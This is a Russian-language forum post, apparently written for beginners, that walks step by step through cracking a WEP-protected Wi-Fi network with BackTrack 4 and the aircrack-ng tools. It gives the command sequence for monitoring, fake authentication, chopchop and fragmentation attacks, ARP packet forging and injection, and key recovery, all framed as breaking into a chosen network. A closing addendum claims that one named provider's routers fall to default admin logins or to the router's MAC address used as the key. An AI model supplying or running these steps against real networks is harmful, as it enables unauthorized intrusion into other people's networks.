Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь
пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме
я уверен что там есть ответы.

1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
еще бывают ath0 mon0 итп.
2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я
просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала
останавливаем все окна командой Ctrl+c и делаем такое
airmon-ng stop mon0
airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
airmon-ng start wlan0 9 - пример.


3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.

4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети
в етом окне будет мак ломаемой сети. И будут собираться пакеты.

Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0

6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
жмем y


Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
2. aireplay-ng -2 -r arp-request wlan0
Команда 8 набираем в одном окне
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
сохраняються на ваш рабочий стол..
9) aircrack-ng -b ломаемый мак capture*.cap

Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep

Я думаю у вас получиться 8-)...
БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.
Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке
.................................................. ...................................
Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! :-) ...